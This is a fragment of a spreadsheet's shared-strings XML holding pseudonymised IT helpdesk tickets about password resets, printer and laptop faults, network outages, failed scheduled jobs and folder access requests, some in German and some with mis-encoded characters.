  <si>
    <t>touchpad and usb mouse not working _x000D_
_x000D_
computer not booting into windows</t>
  </si>
  <si>
    <t>qkprzfew poliamdb</t>
  </si>
  <si>
    <t>user has a new personal device for activation without the approval form.</t>
  </si>
  <si>
    <t>user has a new personal device for activation without the approval form._x000D_
-advised the user to forward the approval form to activate the company  email on personal device.</t>
  </si>
  <si>
    <t xml:space="preserve">ticket update for inc1548457 </t>
  </si>
  <si>
    <t>ticket update for ticket_no0437326</t>
  </si>
  <si>
    <t>windows zdsxmcwu thdjzolw</t>
  </si>
  <si>
    <t>tjcpbliu eaiovlqh</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to distributor_tool with new password and view saved customers details  </t>
  </si>
  <si>
    <t>fwvrsdly dzjnkayq</t>
  </si>
  <si>
    <t>reset passwords for yolktfas fyoxqgvh using password_management_tool password reset.</t>
  </si>
  <si>
    <t>yolktfas fyoxqgvh</t>
  </si>
  <si>
    <t>expense reports submissions in my workflow</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sbvlxuwm.yanbikrx@gmail.com
according to oneteam, jashyht mkuhtyhui (6566632) and qjeymnzs wgpelvyn (6456967) are part of my team now. however, their exepsne report submissions are not coming to my workflow for approval. please look into this and advise.
</t>
  </si>
  <si>
    <t>terminated user called for access to the hub</t>
  </si>
  <si>
    <t>vip2: sim card locked for the company provided phone</t>
  </si>
  <si>
    <t>ipmlkwce plhtfsqo</t>
  </si>
  <si>
    <t>dob report showing blank data for yzugpdco nsyapewg</t>
  </si>
  <si>
    <t xml:space="preserve">this report was working up until september 3rd. now it shows no data when laurent opens the report within reporting_tool (browser)._x000D_
_x000D_
report link used is as follows:_x000D_
#/site/certified_content/views/dailyorderbillingreport/mtd-ctry?:iid=3 _x000D_
_x000D_
output is per attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>the dynamics crm url checks is reporting a : down status on, company-crm-sp-mfg_tooltion.azurewebsites.net. please investigat</t>
  </si>
  <si>
    <t xml:space="preserve">observing below alert in monitoring_tool since 10:50 am on 09/06 et:_x000D_
_x000D_
application "dynamics crm url checks" on node "company-crm-sp-mfg_tooltion.azurewebsites.net" is down </t>
  </si>
  <si>
    <t>need adobe flash player installed on the pc</t>
  </si>
  <si>
    <t>wznkpjis rantlypb</t>
  </si>
  <si>
    <t>drucker ag71 in fÃ¼rth</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: osjqfbvw.hlmgrfpx@gmail.com
hallo,
unser netzwerkdrucker ag71 hÃ¶rt nicht mehr auf zu drucken.
ein â€žgast" scheint versehentlich immer neue druckauftrÃ¤ge zu generieren bzw. laut service techniker vom hersteller hp ist wohl ein spool auftrag im netz gespeichert â€“ wir kÃ¶nnen die druckauftrÃ¤ge nicht sehen, nachverfolgen oder stoppen.
alle versuche, die druckauftrÃ¤ge abzubrechen, sind fehlgeschlagen, auch ein ziehen des steckers oder des lan-kabels nÃ¼tzt nichts.
wer kann helfen?
laut hp sollte das der administrator kÃ¶nnen.
danke.
gabryltke schÃ¼tt
human resources
osjqfbvw.hlmgrfpx@gmail.com&lt;mailto:osjqfbvw.hlmgrfpx@gmail.com&gt;
company shared services gmbh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</si>
  <si>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 xml:space="preserve">unable to login to pc after changing the password </t>
  </si>
  <si>
    <t>xgtyasdp xniowugc</t>
  </si>
  <si>
    <t xml:space="preserve">delivery due list created no delivery note for sto e.g. aw mm#4586645 sto#5019195160- plant_3, please forward to srinfhyath </t>
  </si>
  <si>
    <t xml:space="preserve">deliver due list ews1 is multiple times running on daily basis. sometimes ddl does not create delivery notes from sto, even though material is available and shipping date overdue. _x000D_
1. check why ddl did not select sto 5019195160_x000D_
2. check what sto are overdue _x000D_
3. adjust ddl _x000D_
4. keep user informed about your result. _x000D_
many </t>
  </si>
  <si>
    <t>circuit outage: vogelfontein, south africa , sa mpls circuit is down at 10:51 am et on 06/09. site is up on vpn circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______10:51 am et on 06/09_______________x000D_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____yes__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ______yes__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___na________    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _____yes__     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>mobile device activation - personally owned samsung s7</t>
  </si>
  <si>
    <t>tom called in to get the device activated. please find the mobility agreement attached.</t>
  </si>
  <si>
    <t>mxotdywa veycbhgu</t>
  </si>
  <si>
    <t>7350 - 2nd battery not charging</t>
  </si>
  <si>
    <t xml:space="preserve">the battery on the display is charging up to 100% and it works._x000D_
the battery with the keybankrd is at 76% - plugged in, not charging._x000D_
he is not sure if he is using the charger for the docking station or the charger supplied with the 2 in 1 device._x000D_
we have swapped the power point, still no go._x000D_
_x000D_
updated bios from a08 to a10, still no go._x000D_
_x000D_
please advise..._x000D_
</t>
  </si>
  <si>
    <t>reset the password for tsicojkp kghaozew on windows login</t>
  </si>
  <si>
    <t>this is not resolved per the incident i placed earlier. i need my passwords reset.  please start with windows then i will attempt to update all with password_management_tool.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953b failed in job_scheduler at: 09/06/2016 10:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953b failed in job_scheduler at: 09/06/2016 10:37:00</t>
  </si>
  <si>
    <t>please reset my password for supply_chain_software.</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my password for supply_chain_software._x000D_
</t>
  </si>
  <si>
    <t>ockwafib wftboqry</t>
  </si>
  <si>
    <t>ethics login not recognized</t>
  </si>
  <si>
    <t xml:space="preserve">ethics login is not being recognized. </t>
  </si>
  <si>
    <t>wcrxkiqz zdsloriy</t>
  </si>
  <si>
    <t>unable to print from the default printer</t>
  </si>
  <si>
    <t>reset passwords for tsicojkp kghaozew using password_management_tool password reset.</t>
  </si>
  <si>
    <t>i am locked out of password_management_tool id password manager to sync my passwords and my o365 password is not working. please reset my password.</t>
  </si>
  <si>
    <t>employment status - three new non-employee [enter user's name]</t>
  </si>
  <si>
    <t>*page down to ensure that all required data fields are complete before submitting*
use this template for consultants, temps, interns, vendors, etc.                   please complete all entries.
first name rita
last name baugtymli
location germany
manager / sponsor  lkwspqce knxaipyj
cost center ?
external company name deloitte &amp; touche
what systems do they need access on erp SID_34
mii? no
         if yes â€“ is user operator, admin or supervisor?
security note: for mii â€“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
first name maximgbilian
last name wilsfrtch
location germany
manager / sponsor  lkwspqce knxaipyj
cost center ?
external company name deloitte &amp; touche
what systems do they need access on erp SID_34
mii? no
         if yes â€“ is user operator, admin or supervisor?
security note: for mii â€“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
first name carolutyuin
last name votgygel
location germany
manager / sponsor  lkwspqce knxaipyj
cost center ?
external company name deloitte &amp; touche
what systems do they need access on erp SID_34
mii? no
         if yes â€“ is user operator, admin or supervisor?
security note: for mii â€“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â€“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t>
  </si>
  <si>
    <t>lbqgystk uezmfhsn</t>
  </si>
  <si>
    <t xml:space="preserve">need account adding to my crm </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zfburidj.jmilguev@gmail.com
hi there,
can you please add the following account to my crm. it is one of my assigned accounts but i cannot see it.
account name - pow578ercor
erp # - 8185636495
</t>
  </si>
  <si>
    <t>install zebra \we_wu101 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>organisation chart data in outlook</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team , _x000D_
_x000D_
pl look into below screen shot omfvxjpw htiemzsg is appearing in outlook in my org chart , pl remove the same . _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>thevrxbo makhtjcu</t>
  </si>
  <si>
    <t>travelers</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qcfmxgid.jvxanwre@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i have two more travel profiles.  please see attached/._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">master cost center missing for a person number 11177056737 </t>
  </si>
  <si>
    <t>master cost center missing for a person number 11567177037 - 
cost center should be ltu017</t>
  </si>
  <si>
    <t xml:space="preserve">mismatch   between  plant_63  &amp;  erp inventrory </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ikerxqwz.prkyuitl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
every month we see difference   in quantity   in inventory  between  plant_63  stocks  &amp; erp   stocks   ._x000D_
_x000D_
our assumption was that  in  erp  we inward   stock without paper (customer return  with- out paper but good for resale ) , but it is not so._x000D_
_x000D_
in this connection  attaching the  extraction of plant_63 register  as on 31.8.16 , erp inventory (plant_63)  and   workings which show difference between_x000D_
 erp &amp; plant_63   register_x000D_
_x000D_
i have highlighted   few material  code  in red color which is the difference between    erp &amp; plant_63   and   throws light   that inward   is made with paper  also  downloaded  screen shot of 2 material  code for your reference_x000D_
_x000D_
request you to  investigate  and   revert  with reasons for such difference   ._x000D_
_x000D_
this is time bound activity  and we expect this to be closed by sept 25  , 2016   as the same needs to  informed to the auditor  for  sept 30,2016 ._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> infopath issue - some rules were not applied</t>
  </si>
  <si>
    <t xml:space="preserve"> infopath issue - some rules were not applied
</t>
  </si>
  <si>
    <t>circuit outage: circuit outage: company vpn circuit is down at 8:25 am et on 09/06. site is up on primary circuit</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo site_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______8:25 am et on 09/06________________x000D_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____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______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</si>
  <si>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jtaronux xvurkcbi</t>
  </si>
  <si>
    <t>request it loaner laptop; need on _09_ - _06_ - _2016_</t>
  </si>
  <si>
    <t>** loaners laptops are currently only available for usa employees in usa, pa (hq) and usa employees in usa, ar . we apologize for the inconvenience. **_x000D_
_x000D_
need laptop on _09_ - _06_ - _2016_ (3 days notice is required for a loaner to be ready; laptops can be reserved no more than 2 weeks in advance)._x000D_
_x000D_
will return laptop on 09_ - _07_ - _2016(laptops can be borrowed for a maximum of 3 weeks)._x000D_
_x000D_
does user need remote access (vpn) ? no_x000D_
if yes, who is the requester's manager (approval needed) ?_x000D_
_x000D_
laptop comes with erp, vpn, etc._x000D_
_x000D_
additional software needed?:  _x000D_
_x000D_
 office 2000 (word, excel, powerpoint) y/n? _____x000D_
 outlook y/n? _____x000D_
_x000D_
the following will be updated by it:_x000D_
_x000D_
dell serial number = _x000D_
company asset tag = _x000D_
_x000D_
note: if the laptop and all parts are not returned as scheduled, the requestor's department will be charged replacement cost's.</t>
  </si>
  <si>
    <t>help with mobile phones</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mfizgpoy.akbvznci@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i'm having issues with my company phone and i am not sure who to contact to help me correct the issue. can i please get the contact that can help me solve this problem?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to print. requesting for printer drivers.</t>
  </si>
  <si>
    <t>impact award password reset</t>
  </si>
  <si>
    <t>jlpmakzb encpjsxq</t>
  </si>
  <si>
    <t>hotwlygp afukzhnm - frequent account lockout</t>
  </si>
  <si>
    <t>account keeps locking out after the last password change,</t>
  </si>
  <si>
    <t>business_client - a plug-in is not responding</t>
  </si>
  <si>
    <t xml:space="preserve">i need to view attachments in er2248695, but i get an error "a plug-in is not responding" and i cannot see the attachments.  without seeing the attachments, i do not know what changes to make to the drawings and the parts are on hold in manufacturing._x000D_
</t>
  </si>
  <si>
    <t>cplwfdjk djtriwby</t>
  </si>
  <si>
    <t>fc on departments\distribution</t>
  </si>
  <si>
    <t xml:space="preserve">moin marfhtyio,_x000D_
_x000D_
kannst du bitte herr lzuwmhpr riuheqsg fÃ¼r das laufwerk departments (\\HostName_717), distribution, formulare zulassen. danke! _x000D_
_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>probleme mit we95\ drucker druckt nicht \dknejifu dljvtebc</t>
  </si>
  <si>
    <t>pyeothbl agfxelwz</t>
  </si>
  <si>
    <t>ujsyzrvw vjuyzcih</t>
  </si>
  <si>
    <t>reset passwords for ugawcoye jcfqgviy using password_management_tool password reset.</t>
  </si>
  <si>
    <t>ugawcoye jcfqgviy</t>
  </si>
  <si>
    <t>tastatutur defekt \eewhse \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>install EU_tool und zebra \ewew8323506 \zlqfptjx xnklbfua</t>
  </si>
  <si>
    <t xml:space="preserve">dock station - required </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jmoqelbc.fbzsyjne@gmail.com
hello team,
can you please arrange a dock station for my laptop model â€“ latitude e5450, please let me know if you required further details.
br,aghynil
</t>
  </si>
  <si>
    <t>erp access issue bex hana</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_37_x000D_
_x000D_
enter user id of user having the issue: dofghbmes_x000D_
_x000D_
transaction code(s) the user needs or was working with: bex_x000D_
_x000D_
describe the issue: _x000D_
_x000D_
password logon no longer possible - too many failed attempts_x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t xml:space="preserve">issues with the computer - error messages / not enough space </t>
  </si>
  <si>
    <t xml:space="preserve">issues with the computer. the user can't work. there are regular error messages regarding not enough space on the computer.
the files on the hard drive have been cleaned up, but the problem did not dierppear.  
user: effeghnk
computer name: efdw8111210
please see the attached screenshots with error messages.
the user tried contacting the it help via it chat support, but it did not work on this computer probably due to recent issues.
for further questions, please contact mizpywld dnrubpis at the tel.  or via sky business.
</t>
  </si>
  <si>
    <t>mizpywld dnrubpis</t>
  </si>
  <si>
    <t>reset passwords for imuwhokc ijdfnayb using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">i reset my password tonight and already forgot it. i can't log on to anything. </t>
  </si>
  <si>
    <t>bobj - erp business objects</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ctzykflo.evzbhgru@gmail.com
dear all,
can someone please check .
we do have some new sales employees but the name doesn't show in the "sales plan vs actual" bobj report.
we have f.ex. #
Â·        1044565291 = mjvfxnka zvjxuahe and
Â·        1044535680 = wohzmlib fxwjhapo.
can someone please check and let us know when we will also see the names of the sales people.
is there no automatic routine ?
[cid:image001.jpg@01d2082c.9c01e9c0]
[cid:image002.jpg@01d2082c.9c01e9c0]
</t>
  </si>
  <si>
    <t>laptop login issue _kxmidsga zokivdfa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
i am facing issue with login into laptop while starting_x000D_
_x000D_
the below window is coming (screen shot attached). due to this i am not able to login when i am using laptop as an pad. keybankrd is not showing. so every time i have to connect it with keybankrd to enter user id &amp; password._x000D_
laptop model:  dell latitude 7350_x000D_
_x000D_
[cid:image001.jpg@01d20849.f8d3a360]_x000D_
_x000D_
request you to kindly solve the problem._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>probleme mit outlook \axesnghb cyzuomxa</t>
  </si>
  <si>
    <t>axesnghb cyzuomxa</t>
  </si>
  <si>
    <t>visual studio 2015 license issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rmezbnqt.ntbmkpuh@gmail.com_x000D_
_x000D_
hi,_x000D_
                visual studio professional 2015 in my machine has a license issue, warning message indicates license trial has been expired._x000D_
_x000D_
                but the coverage period for the existing vs2015 license is till 30nov2018._x000D_
_x000D_
                please refer to the attached image for the error description and license validity details._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to send/receive emails from external parties - eonhuwlg sxthcobm, wydorpzi taxcizwv, praddgtip kumfgtyar</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: izwtdnfq.xptuoaid@gmail.com
hi it team,
eonhuwlg sxthcobm cannot receive and send any emails to the external parties via his company email address. however, his colleague, wydorpzi taxcizwv wydorpzi.taxcizwv@gmail.com&lt;mailto:wydorpzi.taxcizwv@gmail.com&gt; can send and receive emails with no any issues.
kindly investigate the issue for debaghjsish and you can take sagar user to compare for the difference.
fyi, both of them are our fi outsource from partner and also got company email address in the same for fi operation support to us.
appreciate if you could prioritise to fix for us. </t>
  </si>
  <si>
    <t>lese- / schreibberechtigung fÃ¼r m:\kbt-auftrgasbearb</t>
  </si>
  <si>
    <t xml:space="preserve">hallo marfhtyio,_x000D_
_x000D_
bitte richte mir die lese- / schreibberechtigung fÃ¼r m:\kbt-auftrgasbearb ein._x000D_
_x000D_
danke  anfghyudrejy_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
freundliche grÃ¼ÃŸe / kind </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/06/2016 03:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/06/2016 03:30:00</t>
  </si>
  <si>
    <t>please review  EU_tool  server in germany - HostName_755 - EU_tool is not working - very urgent</t>
  </si>
  <si>
    <t>xmysiufa emfdltqz</t>
  </si>
  <si>
    <t>reset passwords for pyeothbl agfxelwz using password_management_tool password reset.</t>
  </si>
  <si>
    <t>HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 95% space consumed. space available:  996.0 kb</t>
  </si>
  <si>
    <t>HostName_53: f drive is 100% full.</t>
  </si>
  <si>
    <t xml:space="preserve">please reset password aerp _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">account password is expired </t>
  </si>
  <si>
    <t>moeyphif zfweijcb</t>
  </si>
  <si>
    <t>job que processor for engg database stopped, please restart</t>
  </si>
  <si>
    <t xml:space="preserve">to the database team:_x000D_
the job processor for the engg production system has stopped, please restart._x000D_
</t>
  </si>
  <si>
    <t>reset microsoft online services password</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: tuesday, september 06, 2016 11:38 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: rad:request to reset microsoft online services password for rmezbnqt.ntbmkpuh@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ rmezbnqt.ntbmkpuh@gmail.com 
â€¢ first name: nihktgsh kurtyar  
â€¢ last name: kaghjtra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</si>
  <si>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not able to access SID_1</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: miecoszw.mhvbnodw@gmail.com
hi,
not able to access SID_1 system
user id- heghjyder
gajthyana hegdergyt
manager- finance
miecoszw.mhvbnodw@gmail.com&lt;mailto:miecoszw.mhvbnodw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>reset the password for guldiwmn aroqwuvz on erp / production / erp</t>
  </si>
  <si>
    <t>i cannot log or change my erp password. ploease help.</t>
  </si>
  <si>
    <t>guldiwmn aroqwuvz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1346 failed in job_scheduler at: 09/06/2016 02:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1346 failed in job_scheduler at: 09/06/2016 02:03:00</t>
  </si>
  <si>
    <t>vpn connection failure</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xwertljy.zrmlhkyq@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to connect to vpn._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>"\\HostName_625\departments\ehs_arbeitsmedizin": bitte den verantwortlichen Ã¤ndern von metghyjznk auf roedfghtec</t>
  </si>
  <si>
    <t>bitte den verantwortlichen des ordners "\\HostName_625\departments\ehs_arbeitsmedizin" Ã¤ndern von ozphysqw pgcmwqze (metghyjznk) auf clara rÃ¶der (roedfghtec) ... danke!
please change the owner of this folder to vhebydgs rtmjwyvk (roedfghtec)</t>
  </si>
  <si>
    <t>ozphysqw pgcmwqze</t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to system wh my user id and details on new hardware replaced </t>
  </si>
  <si>
    <t>computer name  : aiml7801004</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1343 failed in job_scheduler at: 09/06/2016 01:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1343 failed in job_scheduler at: 09/06/2016 01:13:00</t>
  </si>
  <si>
    <t>åˆ é™¤äº†ä¸€ä¸ªexcel æ–‡æ¡£ï¼Œæ–‡æ¡£åœ°å€ï¼š\\HostName_17\teams\business\c2 qualitycontrol\c25 quality project\c251 k100\weekly layered process audi</t>
  </si>
  <si>
    <t>åˆ é™¤äº†ä¸€ä¸ªexcel æ–‡æ¡£ï¼Œ"kmfg0042f01r00---lpa countermeasures ï¼ˆfy17 total),æ–‡æ¡£åœ°å€ï¼š\\HostName_17\teams\business\c2 qualitycontrol\c25 quality project\c251 k100\weekly layered process audit\fy17</t>
  </si>
  <si>
    <t>rjxbiplo jmhnleaq</t>
  </si>
  <si>
    <t>virus scanned</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pxbqkfgm.qexvrmcn@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
pls. do the needful._x000D_
_x000D_
[cid:image003.jpg@01d20828.8bd3bff0]_x000D_
_x000D_
vivthyek byuihand_x000D_
asst manager- sales_x000D_
company india ltd, india._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to company wi-fi </t>
  </si>
  <si>
    <t>attendance_tool id and password.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ojgfmvep.zbatowgi@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
need help as i forgot my attendance_tool login id and password._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>not able to add id01 as printer in my laptop</t>
  </si>
  <si>
    <t>not able to add id01 as printer in my laptop. after installing driver, system throws up an error - can't add printer.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2110 failed in job_scheduler at: 09/06/2016 00:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2110 failed in job_scheduler at: 09/06/2016 00:05:00</t>
  </si>
  <si>
    <t xml:space="preserve">ctrl, alt and delete keys are not working </t>
  </si>
  <si>
    <t xml:space="preserve">ctrl ,alt and delete keys are not working
unable  to login to pc 
dell latitude 6420
contact no 
assisted user click on easy to access option
and enable type without key bankrd option
with help of cursor click on control ,alt and delete (no go)
delete button is not working 
</t>
  </si>
  <si>
    <t>cjklxmhi hmrkzbxu</t>
  </si>
  <si>
    <t>serious issue with transports in SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">we observed that request SID_35k910228 was imported with warnings on 24th june has been re-imported twice on 16th july and 3rd sep. can you please check and share the details of why this is happening?_x000D_
_x000D_
this is a serious issue as this request is trying to over-write the changes that were done post this transport._x000D_
</t>
  </si>
  <si>
    <t>reset microsoft online services password for jhyazros.azdxonjg@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: tuesday, september 06, 2016 8:54 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: rad:request to reset microsoft online services password for jhyazros.azdxonjg@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ jhyazros.azdxonjg@gmail.com 
â€¢ first name: venfgugjhytpal 
â€¢ last name: nythug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</si>
  <si>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erp SID_34 kis error</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pkdavqwt.tafrmxsh@gmail.com
hello it team,
dn 9168066866 was processed in erp kis, but its kis record was missed. its sf tracking number is 60666560449820.
could you find the cause and fix it?
</t>
  </si>
  <si>
    <t>folder access request.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sepbdtou.noredzyx@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please help to provide access to HostName_64\departments as follows:_x000D_
p:\financemssg-apac\partner\ctc_x000D_
person to access:_x000D_
lxkecjgr fwknxupq : lxkecjgr.fwknxupq@gmail.com&lt;mailto:lxkecjgr.fwknxupq@gmail.com&gt;_x000D_
fjzywdpg vkdobexr : fjzywdpg.vkdobexr@gmail.com&lt;mailto:fjzywdpg.vkdobexr@gmail.com&gt;_x000D_
tnorudbf lauftqmd: tnorudbf.lauftqmd@gmail.com_x000D_
_x000D_
p:\financemssg-apac\partner\rtr_x000D_
person to access:_x000D_
qcjevayr xirwgjks: qcjevayr.xirwgjks@gmail.com&lt;mailto:qcjevayr.xirwgjks@gmail.com&gt;_x000D_
nil madhaw rai: hkjfmcqo.gpcxltar@gmail.com&lt;mailto:hkjfmcqo.gpcxltar@gmail.com&gt;_x000D_
uyocgasl ogabwxzv: uyocgasl.ogabwxzv@gmail.com&lt;mailto:uyocgasl.ogabwxzv@gmail.com&gt;_x000D_
nfdtriwx lriupqct: nfdtriwx.lriupqct@gmail.com&lt;mailto:nfdtriwx.lriupqct@gmail.com&gt;_x000D_
_x000D_
level of access: full control_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>sepbdtou noredzyx</t>
  </si>
  <si>
    <t>unable to login windows</t>
  </si>
  <si>
    <t>system is not booting up</t>
  </si>
  <si>
    <t>unable to receive mail from bank of amerirtca (cash pro online)</t>
  </si>
  <si>
    <t>i have raised a request for access in the bank portal but i cannot receive mail from them._x000D_
kindly assist.</t>
  </si>
  <si>
    <t>hkjfmcqo gpcxltar</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2555 failed in job_scheduler at: 09/05/2016 22:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2555 failed in job_scheduler at: 09/05/2016 22:00:00</t>
  </si>
  <si>
    <t>can not serch my engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
i can not serch for my engineering_tool if i specify the date._x000D_
the error on the bottom of the window shows that i do not have the access to it._x000D_
please give me the access._x000D_
</t>
  </si>
  <si>
    <t>gtehdnyu belt tracker</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sdbcpvtx.hzpctsla@gmail.com
above is the link to the gtehdnyu belt tracker.  the person who generated this site (nicrhty pfgyhtu) and wrote the original programdnty had it set up so that the full time oe personnel did not ever receive recertification notices and warnings.  all of a sudden this week we are all receiving those emails.  i am attaching one of the emails.
the list of oe personnel who should not receive these emails for any gtehdnyu belts:
clswzxoq higqaepr
pattghyuy karcgdwswski
dkinobsv wymgzcrh
ykolismx kbysnuim
yhroaeqj djtyroha
phksfqxe wkbovsmu
dshferby houtnzdi
mikhghytr gerusky
jafgty verghjuen
i am double checking to see if my list is complete.
these people are full time oe and permanently certified.
please let me know what else you need.
</t>
  </si>
  <si>
    <t>user needs help login to the company vpn.</t>
  </si>
  <si>
    <t>telephony_software password has expired</t>
  </si>
  <si>
    <t xml:space="preserve">my telephony_software password is getting expired today. please reset the password and let me know so that i can login.
user id - mukghyuhea
contact no - </t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform application uninstalled </t>
  </si>
  <si>
    <t xml:space="preserve">"scghhnelligkeit" meines internets plnvcwuq ikupsjhb ( umstellung auf ip / anpassung router speedport w504v !? ) </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jclrangd.kjlnearz@gmail.com
hallo frau muejkipler,
ich hoffe sie sind fÃ¼r diesen fall die richtige ansprechpartnerin bzw. wissen wer hier herrn plnvcwuq ikupsjhb noch weiter helfen kann.
herr voigt ist nicht mehr greifbar und herr gerberghty im urlaub. ich wÃ¼rde vermuten, dass hier eine direkte klÃ¤rung und mithilfe bzgl. beurteilung u.a. der telekom notwendig ist.
allerdings ist mir nicht bekannt wie aktuell der stand im unternehmen company ist bzgl. ip umstellung.
oder mÃ¼ssen wir warten bis herr gerberghty aus dem urlaub ist !?
mit freundlichen grÃ¼ÃŸen / with kind </t>
  </si>
  <si>
    <t>oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)</t>
  </si>
  <si>
    <t>can u pl. check if server HostName_637 is working fine</t>
  </si>
  <si>
    <t xml:space="preserve">from: nanrfakurtyar  c 
sent: monday, 05 september, 2016 8:49 pm
to: -dba
subject: can u pl. check if server HostName_637 is working fine
can u pl. check if server HostName_637 is working fine.
also check edmsm011
</t>
  </si>
  <si>
    <t>password reset : login issues</t>
  </si>
  <si>
    <t>restore o:\schaem\eigene dateien\db1.mdb</t>
  </si>
  <si>
    <t xml:space="preserve">hallo 
wÃ¼rdest du bitte diese datei "o:\schaem\eigene dateien\db1.mdb" zurÃ¼cksetzen
es scheint alles nicht mehr zu funktionieren
danke
cflrqoew qbgjwaye
process planning
cflrqoew.qbgjwaye@gmail.com
</t>
  </si>
  <si>
    <t>restore directory schulzgth from public</t>
  </si>
  <si>
    <t xml:space="preserve">hallo marfhtyio,_x000D_
_x000D_
_x000D_
